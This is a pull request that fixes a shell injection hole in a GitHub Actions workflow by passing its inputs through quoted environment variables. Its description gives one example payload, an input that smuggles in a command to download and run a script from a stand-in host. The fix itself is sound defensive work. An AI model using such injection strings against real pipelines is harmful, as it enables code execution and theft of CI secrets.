### PR TITLE
fix: prevent shell injection in update-identity workflow

### DIFF
--- a/.github/workflows/update-identity.yml
+++ b/.github/workflows/update-identity.yml
@@ -56,12 +56,16 @@ jobs:
       - name: Update identity version in ./parent/pom.xml
         id: update-identity-version
         if: ${{ steps.get-current-identity-version.outputs.info != inputs.identityVersion }}
+        env:
+          IDENTITY_VERSION: ${{ inputs.identityVersion }}
         run: |
-          ./mvnw versions:set-property -DgenerateBackupPoms=false -Dproperty=version.identity -DnewVersion=${{ inputs.identityVersion }} -pl parent
-          git commit -am "deps(identity): update identity to ${{ inputs.identityVersion }}"
+          ./mvnw versions:set-property -DgenerateBackupPoms=false -Dproperty=version.identity -DnewVersion="$IDENTITY_VERSION" -pl parent
+          git commit -am "deps(identity): update identity to $IDENTITY_VERSION"
       - name: Push Changes to the target branch
         if: ${{ steps.update-identity-version.outcome == 'success' && inputs.dryRun == false }}
-        run: git push origin "${{ inputs.targetBranch }}"
+        env:
+          TARGET_BRANCH: ${{ inputs.targetBranch }}
+        run: git push origin -- "$TARGET_BRANCH"
       - name: Import Camunda Secrets
         if: success()
         id: camunda-secrets


### PR DESCRIPTION
## Description

Fix a shell injection vulnerability (CWE-78 / CWE-94) in `.github/workflows/update-identity.yml`.

The `workflow_dispatch` inputs `identityVersion` and `targetBranch` were interpolated directly into `run:` blocks via `${{ inputs.* }}`. GitHub Actions performs this expansion as textual substitution **before** bash parses the script, so shell metacharacters in the input become live shell syntax.

For example, `identityVersion=1.0.0; curl evil/p.sh | bash; #` would execute arbitrary commands on the runner, which has:
- `contents: write` permissions (can push to release branches)
- Vault credentials (`VAULT_ROLE_ID` / `VAULT_SECRET_ID`)
- Access to the monorepo-release client config

### Changes

Moved `inputs.identityVersion` and `inputs.targetBranch` from direct `${{ }}` interpolation in `run:` blocks into `env:` blocks, referenced as quoted shell variables (`"$IDENTITY_VERSION"`, `"$TARGET_BRANCH"`).

This follows the safe pattern already used in `chatops-command-disable-cache.yml` and aligns with [GitHub's Actions security hardening guide](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).

### Risk

- **Before**: Any collaborator with Actions write access could inject arbitrary shell commands via the "Run workflow" UI.
- **After**: Inputs are passed through environment variables, preventing shell interpretation of metacharacters.

### References

- [GitHub Actions security hardening — script injections](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)
- CWE-78 (OS Command Injection), CWE-94 (Code Injection)
- [ASANA task](https://app.asana.com/1/384886434863350/project/1208335677070296/task/1214111091421288?focus=true)